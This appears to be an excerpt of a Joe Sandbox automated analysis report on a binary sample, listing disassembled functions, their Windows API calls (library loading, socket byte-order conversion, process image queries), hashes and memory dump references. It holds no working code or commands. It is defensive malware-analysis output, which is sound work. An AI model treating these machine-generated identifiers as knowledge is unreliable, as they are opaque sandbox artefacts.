                            • Instruction ID: fa1ab27e1ba1122e289714b8d9f02065ffaf2acf568b413928bd7f12dd88e1a8
                            • Opcode Fuzzy Hash: ce248c9b76cab28e3bfe0f4cf382fe857c104996694ccf4999fe2e4bab742bed
                            • Instruction Fuzzy Hash: AD219F719042099EDB14EF98DA85AEEBBB8FF18310F1005AFE104E7281DBB45F40CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00412ECB: __EH_prolog.LIBCMT ref: 00412ED0
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00413225
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 00413230
                            • new.LIBCMT ref: 00413241
                              • Part of subcall function 00413005: __EH_prolog.LIBCMT ref: 0041300A
                              • Part of subcall function 0041046F: __EH_prolog.LIBCMT ref: 00410474
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrow
                            • String ID: 5A
                            • API String ID: 1193697898-1205544748
                            • Opcode ID: 384d465795c22ab1ba6152e2b118ee0d2ee54f20568b894faee348875323fcc2
                            • Instruction ID: 2959379232cb9b729b7ea92543b75de708907a1a88a4badf2d514b17641bbd42
                            • Opcode Fuzzy Hash: 384d465795c22ab1ba6152e2b118ee0d2ee54f20568b894faee348875323fcc2
                            • Instruction Fuzzy Hash: D521F3B1A00209EBC704DFA8C849B9DBBF9FF48328F10425DE0149B682E7B5E944CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00576A31
                              • Part of subcall function 00579730: __EH_prolog.LIBCMT ref: 00579735
                            • _strlen.LIBCMT ref: 00576A53
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$_strlen
                            • String ID: Windows bitmap (*.bmp;*.dib)$}jW
                            • API String ID: 1490583215-1740260866
                            • Opcode ID: 71b5646ddde94cff020f9d6448a3056f2f6b78017e63f0dba83c0cbd5f5bf5e5
                            • Instruction ID: 030bba940c4e6c41b1e2b76196a51ab20cdfe42042398e5736aee373c93e6e37
                            • Opcode Fuzzy Hash: 71b5646ddde94cff020f9d6448a3056f2f6b78017e63f0dba83c0cbd5f5bf5e5
                            • Instruction Fuzzy Hash: 77F0A0B1910644AFDB24AF5CD9067AEFBF8EF91721F10466FF41593692C7B81D0086A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00416464
                            • std::exception::exception.LIBCONCRT ref: 00416481
                              • Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313
                              • Part of subcall function 0041CC56: __EH_prolog.LIBCMT ref: 0041CC5B
                              • Part of subcall function 0041CC56: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CCA9
                            Strings
                            • could not convert calendar time to UTC time, xrefs: 00416479
                            • \$n, xrefs: 00416498
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Exception@8Throw___std_exception_copystd::exception::exception
                            • String ID: \$n$could not convert calendar time to UTC time
                            • API String ID: 4220666059-2154543917
                            • Opcode ID: d7fddeb6a064ba2be686af1137db9a1ef2c884885b7df00f073050f86353281e
                            • Instruction ID: 8a9a92933aec560c30ce54c15b6476c3cd712f5fe7399fc520bae466908f9048
                            • Opcode Fuzzy Hash: d7fddeb6a064ba2be686af1137db9a1ef2c884885b7df00f073050f86353281e
                            • Instruction Fuzzy Hash: 11E0927094410AABDF00FF90D4127EDBF75EB10308F00406DE80966682DB354A89C7C9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CloseHandle.KERNEL32(00000000,00000000,?,00694E72,00000000), ref: 00694DB8
                            • FreeLibrary.KERNEL32(00000000,00000000,?,00694E72,00000000), ref: 00694DC7
                            • _free.LIBCMT ref: 00694DCE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFreeHandleLibrary_free
                            • String ID: rNi
                            • API String ID: 621396759-4070628955
                            • Opcode ID: 4be1767a745363d1034496d1ebfe29672bafa37095298dd1f2ee2e283b9b87a8
                            • Instruction ID: cc26c4fcb4a770e691d764eabadab309c4522081c77c2f79e02484117e592f6e
                            • Opcode Fuzzy Hash: 4be1767a745363d1034496d1ebfe29672bafa37095298dd1f2ee2e283b9b87a8
                            • Instruction Fuzzy Hash: 3EE04632400724ABDB212B45E848F96BBAAEF40321F14802AE55916960CB75AC99CF94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0040F255
                            • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0040F261
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: CreateSymbolicLinkW$kernel32.dll
                            • API String ID: 1646373207-1962376091
                            • Opcode ID: bd1c4cbd6ce50e022914dd3e2c166698ba0eed112ea3e3cb77a4a08f240cc9c4
                            • Instruction ID: 590e85ebbecf18d2bf37684d831ec6b356c8ba3942a5e88775856824f88f2486
                            • Opcode Fuzzy Hash: bd1c4cbd6ce50e022914dd3e2c166698ba0eed112ea3e3cb77a4a08f240cc9c4
                            • Instruction Fuzzy Hash: 19B092B05823D0ABDB005BE1ACCD91C3B2ABA14702701A451F842CE664DFB442828E14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0040F235
                            • GetProcAddress.KERNEL32(00000000,CreateHardLinkW), ref: 0040F241
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: CreateHardLinkW$kernel32.dll
                            • API String ID: 1646373207-294928789
                            • Opcode ID: e8356c8db0eb464db37513e9733c3783437a20d9dd90c0bb0afac3dc72d696ec
                            • Instruction ID: 14882fced2e313a79112ea7472962911ea01498a907f2e19416e74a3366ec373
                            • Opcode Fuzzy Hash: e8356c8db0eb464db37513e9733c3783437a20d9dd90c0bb0afac3dc72d696ec
                            • Instruction Fuzzy Hash: 5EB092B15813C49BDB005BF2AC4D91C3AAAFA0A782B019021F141AE660DBB852828F14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00477589
                              • Part of subcall function 00477972: __EH_prolog.LIBCMT ref: 00477977
                              • Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065
                              • Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004610E6
                              • Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000), ref: 0046111C
                              • Part of subcall function 00476ADD: __EH_prolog.LIBCMT ref: 00476AE2
                              • Part of subcall function 004B1FC7: __EH_prolog.LIBCMT ref: 004B1FCC
                              • Part of subcall function 004B0769: __EH_prolog.LIBCMT ref: 004B076E
                              • Part of subcall function 0044E82C: __EH_prolog.LIBCMT ref: 0044E831
                              • Part of subcall function 0044DE59: __EH_prolog.LIBCMT ref: 0044DE5E
                              • Part of subcall function 0044DE59: new.LIBCMT ref: 0044DE84
                              • Part of subcall function 0044DE59: GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044DEEB
                              • Part of subcall function 0044DE59: GetProcAddress.KERNEL32(?,?), ref: 0044DF6C
                            • GetCurrentProcess.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00477877
                            • QueryFullProcessImageNameW.KERNEL32(00000000), ref: 0047787E
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00477893
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ByteCharModuleMultiNameProcessWide$AddressCurrentFileFullHandleImageProcQuery
                            • String ID:
                            • API String ID: 1400389073-0
                            • Opcode ID: daa91a3d4ac90b48ad98c1bc427d7e0625199bf09e79e4707d205b216cb46ec6
                            • Instruction ID: 77dbdb629de6e5b2ffc1487bde3b959b04d2b71e04adcbb9b4aafba9b4c546bf
                            • Opcode Fuzzy Hash: daa91a3d4ac90b48ad98c1bc427d7e0625199bf09e79e4707d205b216cb46ec6
                            • Instruction Fuzzy Hash: FF919170D05248DEEB10EBA9C885BEEBBB4EF55318F24409EE005672D2DBB81F44CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00428C19
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 00428C24
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionException@8H_prologRaiseThrow
                            • String ID:
                            • API String ID: 1681477883-0
                            • Opcode ID: 12c126017bac493b87436cdb4e7aaa7d22f66e67c0da983c2690849cdd9225cc
                            • Instruction ID: 09943afd76b2b5a18f3034c807080fe7ad61a4c7bfeed76e4b810f933ad66ed5
                            • Opcode Fuzzy Hash: 12c126017bac493b87436cdb4e7aaa7d22f66e67c0da983c2690849cdd9225cc
                            • Instruction Fuzzy Hash: D681E470904208AFDB18EFA5D881BEEBBB8EF45318F10851EF151A72D2DB7C5A45CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __Getcvt.LIBCPMT ref: 00583709
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,?,00000000,?,?,00000000), ref: 00583757
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,00000000), ref: 005837C9
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,00000000), ref: 005837F1
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$Getcvt
                            • String ID:
                            • API String ID: 3195005509-0
                            • Opcode ID: a3b2177d8fdd4ecda830a65a8d8357f5f0bfd8249116f44052f9ee3a900161d2
                            • Instruction ID: 028dbf08a08d6e8980168f097ad405ac58da46d692f257a6541ef53f62bb6532
                            • Opcode Fuzzy Hash: a3b2177d8fdd4ecda830a65a8d8357f5f0bfd8249116f44052f9ee3a900161d2
                            • Instruction Fuzzy Hash: 2B41DFB1600385AFEB21AF69C841B6ABFE9FF41B10F144429EC51EB290E771DE44CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00424FDD
                            • EnterCriticalSection.KERNEL32(?), ref: 00424FF1
                            • LeaveCriticalSection.KERNEL32(?), ref: 0042501F
                            • CloseHandle.KERNEL32(00000004), ref: 00425044
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$CloseEnterH_prologHandleLeave
                            • String ID:
                            • API String ID: 2171098948-0
                            • Opcode ID: 0ff9093e8cd333616d5b5af9b1e4738176e8b7a1af486dcb1692b5c5d15b3d57
                            • Instruction ID: 85d8d80b7c220fc05af3a2f7d44c9744e694d5b0b3e2059fba10bea74bec90c5
                            • Opcode Fuzzy Hash: 0ff9093e8cd333616d5b5af9b1e4738176e8b7a1af486dcb1692b5c5d15b3d57
                            • Instruction Fuzzy Hash: 54417971A01A259FCB28DFA8D880BAEFBB0BF04710F40415ED915AB341CB74AE40CBE5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000107,00000000,00000000,?,?,?,?,00000001,00000107,?,00000001,?,00000000), ref: 006B047B
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000107,00000000,?,?,?,?,00000001,00000107,?,00000001,?,00000000,?), ref: 006B0504
                            • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000107,?,00000001,?,00000000,?,00000107,?), ref: 006B0516
                            • __freea.LIBCMT ref: 006B051F
                              • Part of subcall function 006A108E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006AAD9E,00001000,00000000,?,?,?,006A082B,00000000,00000000,00000000,?,?), ref: 006A10C0
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: 97f42e6e783000c67b4c068e863534cc4fc4ab11a9e61b10c8c2f8b25a44b242
                            • Instruction ID: cc9d3210c437c6616901ac33e6ac38521ebe38c45e241f758d63c01827b6ee30
                            • Opcode Fuzzy Hash: 97f42e6e783000c67b4c068e863534cc4fc4ab11a9e61b10c8c2f8b25a44b242
                            • Instruction Fuzzy Hash: DB31AEB2A0021AABEF259F64CC45DEF7BA6EB40310F144169FC05DA290EB35CD90CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 005717FD
                            • new.LIBCMT ref: 0057182A
                            • InitializeCriticalSection.KERNEL32(0000001C,00000000,007A4460,?,?,00571F4A,?,?,?,0040F09B), ref: 0057184D
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00571F4A,?,?,?,0040F09B), ref: 00571864
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateCriticalEventH_prologInitializeSection
                            • String ID:
                            • API String ID: 3158263371-0
                            • Opcode ID: 94b41bb9ff59bbe4f5ad02acec730859a2dbfae20486d502a5a7aa5c2f1e2c00
                            • Instruction ID: 876213ab9cbc130f362b3ed82c620c3093d4f37ea1a0ae280deac4a34f932a9a
                            • Opcode Fuzzy Hash: 94b41bb9ff59bbe4f5ad02acec730859a2dbfae20486d502a5a7aa5c2f1e2c00
                            • Instruction Fuzzy Hash: BC3132B08053009FDBA4DF68D8847967BE4FF09310F1046AEEC19CF28AE3B18944CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00414E0E
                            • TlsGetValue.KERNEL32 ref: 00414E88
                            • TlsSetValue.KERNEL32(?), ref: 00414EA1
                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?), ref: 00414ED4
                              • Part of subcall function 00414F2A: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 00414F51
                              • Part of subcall function 00414F2A: GetLastError.KERNEL32 ref: 00414F5B
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value$CompletionErrorH_prologLastPostQueuedStatus
                            • String ID:
                            • API String ID: 158160221-0
                            • Opcode ID: 586e919ffb6655bfbbf2e445b8256441f2e0ea899b9af754ab72a0c52bca22dc
                            • Instruction ID: d71777ad571c8ca19c34f38a4bac23b68ce0d84137122360d3092e72d4341679
                            • Opcode Fuzzy Hash: 586e919ffb6655bfbbf2e445b8256441f2e0ea899b9af754ab72a0c52bca22dc
                            • Instruction Fuzzy Hash: DC31C071D00608EFDB05DFA9D8819EEBBB5FF88300F10813EE415A7260DB395A098B94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • htons.WS2_32(?), ref: 00416C76
                              • Part of subcall function 00416B9A: __EH_prolog.LIBCMT ref: 00416B9F
                            • htonl.WS2_32(00000000), ref: 00416C8D
                            • htonl.WS2_32(00000000), ref: 00416C94
                            • htons.WS2_32(?), ref: 00416CA8
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: htonlhtons$H_prolog
                            • String ID:
                            • API String ID: 984249084-0
                            • Opcode ID: 69d3e31cd2f03239069176d02f0421dedb84e356e9a7d0d2334ac185ddb40043
                            • Instruction ID: e7ff9ceaa40ac1d9ce4b5bbe90b71808129459a827f70b7e23d2d4d09dd11159
                            • Opcode Fuzzy Hash: 69d3e31cd2f03239069176d02f0421dedb84e356e9a7d0d2334ac185ddb40043
                            • Instruction Fuzzy Hash: 81216376914204ABCB209FA4DC06F9AB7F9FF48710F00852BF956D7690E738E8548B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041081C
                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 00410856
                            • EnterCriticalSection.KERNEL32 ref: 00410867
                            • LeaveCriticalSection.KERNEL32(?,?), ref: 00410897
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                            • String ID:
                            • API String ID: 3890610498-0
                            • Opcode ID: 9f8ffbdbcf60fbe60262c8921c14737b7b0069439acc42f7ec21859bc28d27a0
                            • Instruction ID: 595c1b188952251bd2dacb951881a4d652b48873ec76a9dc35cae2145f26181e
                            • Opcode Fuzzy Hash: 9f8ffbdbcf60fbe60262c8921c14737b7b0069439acc42f7ec21859bc28d27a0
                            • Instruction Fuzzy Hash: FC11EF71905215DBDB15EF64C885BAFBBB8FF45729F10006EE801AB341C7B89981CBE5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004AB570
                            • std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 004AB58D
                              • Part of subcall function 005843D7: __EH_prolog3.LIBCMT ref: 005843DE
                              • Part of subcall function 005843D7: new.LIBCMT ref: 005843E5
                              • Part of subcall function 005843D7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 005843FC
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004AB5A9
                              • Part of subcall function 00583CC5: __EH_prolog3.LIBCMT ref: 00583CCC
                              • Part of subcall function 00583CC5: std::_Lockit::_Lockit.LIBCPMT ref: 00583CD6
                              • Part of subcall function 00583CC5: Concurrency::cancel_current_task.LIBCPMT ref: 00583D09
                              • Part of subcall function 00583CC5: std::_Lockit::~_Lockit.LIBCPMT ref: 00583D7C
                            • _Yarn.LIBCPMT ref: 004AB5BD
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Lockitstd::_$Locimp::_std::locale::_$H_prologH_prolog3LocimpLockit::_Lockit::~_$AddfacConcurrency::cancel_current_taskLocimp_New_Yarn
                            • String ID:
                            • API String ID: 3501155517-0
                            • Opcode ID: 062c1b1ec6b5b8f7a93138f2578596e16de038775c30bf3b263c81f7f22aedb0
                            • Instruction ID: bfeef356df4ba868fc20926f83e03bfe523200e894b43230a5974da24efb3e8f
                            • Opcode Fuzzy Hash: 062c1b1ec6b5b8f7a93138f2578596e16de038775c30bf3b263c81f7f22aedb0
                            • Instruction Fuzzy Hash: E011DD71A00615AFD714EF55C44AB7AFBA4FF21326F00822EE50697692CB79AD10CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 004B399D: __EH_prolog.LIBCMT ref: 004B39A2
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B0DFC
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 004B0E07
                            • GetProcessHeap.KERNEL32(00000000,00000040), ref: 004B0E1B
                            • HeapAlloc.KERNEL32(00000000), ref: 004B0E22
                              • Part of subcall function 0040F438: __EH_prolog.LIBCMT ref: 0040F43D
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Heap$AllocExceptionException@8ProcessRaiseThrow
                            • String ID:
                            • API String ID: 1668733864-0
                            • Opcode ID: d23a0b3dc1c94f81aa508c56cd2c60338607f869b22be358fc248e92d61e491c
                            • Instruction ID: 350d84d1d5f25fe52a91066693df434387abb4621305467a0a35fe1cc05a434f
                            • Opcode Fuzzy Hash: d23a0b3dc1c94f81aa508c56cd2c60338607f869b22be358fc248e92d61e491c
                            • Instruction Fuzzy Hash: 771191B1D05258DBDB10EFA9C54ABAEBFB8EF08700F10046EE544A7242D7B95E04CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,006AB264,?,00000000,00000000,00000000,?,006AB590,00000006,FlsSetValue), ref: 006AB2EF
                            • GetLastError.KERNEL32(?,006AB264,?,00000000,00000000,00000000,?,006AB590,00000006,FlsSetValue,0071F508,0071F510,00000000,00000364,?,006A9FB1), ref: 006AB2FB
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006AB264,?,00000000,00000000,00000000,?,006AB590,00000006,FlsSetValue,0071F508,0071F510,00000000), ref: 006AB309
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 4376a6cb57514a3e2f998794821d34c283dc87282710ac62b7bad34459de6416
                            • Instruction ID: 4bdbfffff69f1da8354d80988fd09d6fcd354b261645325d4f3cf7198916ad7f
                            • Opcode Fuzzy Hash: 4376a6cb57514a3e2f998794821d34c283dc87282710ac62b7bad34459de6416
                            • Instruction Fuzzy Hash: F401FC32605223ABDF215B68AC44AA777DAEF06760B115124F905D7242D760DD018EE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00424011
                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00424045
                            • EnterCriticalSection.KERNEL32 ref: 00424056
                            • LeaveCriticalSection.KERNEL32(?,?), ref: 00424079
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                            • String ID:
                            • API String ID: 3890610498-0
                            • Opcode ID: 69df4b39d4aff6cd6478f95013156769a9bb6003584e35ece7b260fea5d2cb0d
                            • Instruction ID: bf8b0a2ab09907e7b3f54f1672bf021df903123a154a6b7f892ca0429662d47f
                            • Opcode Fuzzy Hash: 69df4b39d4aff6cd6478f95013156769a9bb6003584e35ece7b260fea5d2cb0d
                            • Instruction Fuzzy Hash: 13118B71A0021AAFC710DF69D885B9EFBB8FF55721F00412AE515E7650D7B0AA54CFE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00424097
                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 004240C9
                            • EnterCriticalSection.KERNEL32 ref: 004240DA
                            • LeaveCriticalSection.KERNEL32(?,?), ref: 004240FD
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
